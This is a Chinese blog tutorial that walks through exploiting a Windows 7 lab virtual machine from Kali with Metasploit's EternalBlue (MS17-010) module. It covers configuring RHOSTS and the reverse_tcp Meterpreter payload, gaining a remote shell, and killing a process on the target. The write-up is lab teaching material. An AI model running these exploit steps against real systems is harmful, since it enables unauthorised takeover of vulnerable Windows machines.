)
前提1、已经准备好另一台带着windows7的电脑或者已打开windows7虚拟机用作靶向机windows7不知道怎么装的可以看我另一篇笔记VMware安装windows7虚拟机-CSDN博客2、靶机和kali要处在同一网段最省事的办法就是win7和kali的网络都选择桥接模式。在Kali桌面按下ctrlaltt进入终端输入sudo su后输入密码回车进入超级管理员模式输入msfconsolej进入该软件的命令行回车出现msf 就是成功了。接下来进入正题。msf的使用仅需三个步骤选择模块-配置所选模块必选项-运行模块。本文介绍的是利用“永恒之蓝”漏洞模块。选择模块在msf中输入use exploit/windows/smb/ms17_010_eternalblue这一串是模块的名称从哪来的可以看我另一篇文章回车配置模块先输入show options查看配置上半部分的module option是指的当前漏洞/攻击模块的参数目标、端口等。payload options部分设定的是你想对该攻击目标做什么截图中所显示的windows/x64/meterpreter/reverse_tcp可见该漏洞默认的行为就是获取你的电脑的控制权限。• RHOSTS远程目标IP/网段几乎所有扫描、漏洞模块必填• RPORT目标开放端口默认多为80、443、3389等• LHOST本机监听IP反弹马、监听载荷必备• LPORT本机监听端口• USERNAME/PASSWORD爆破类模块的账号密码这里面required栏里面标着yes的就是配置的必选项current setting栏有内容代表该项目已经配置好了可以不用管目前已知就RHOSTS要设置那么就设置该变量的值。首先查看你的win7的ipv4地址然后输入set RHOSTS 该ipv4地址设定某个参数的值的指令基本都是set参数名要设定的值这个工具默认的攻击窗口是4444我们也可以切换成其他端口接下来开始运行模块输入run然后回车↑这样就是获取到靶机的权限了然后会跳出meterpreter 我们输入shell直接进入win7靶机的后台在这里我们可以执行一些指令举个例子把靶机里面的某些程序关掉。在win7打开扫雷在kali输入tasklist打开进程清单可以看到扫雷这个进程输入taskkill /f /im MineSweeper.exe即可关闭该进程再看回win7扫雷确实被关闭了【小瑕疵可见每次访问的返回值都带有乱码可以看我另一篇笔记Kali使用细节笔记-CSDN博客的第5条完美修复】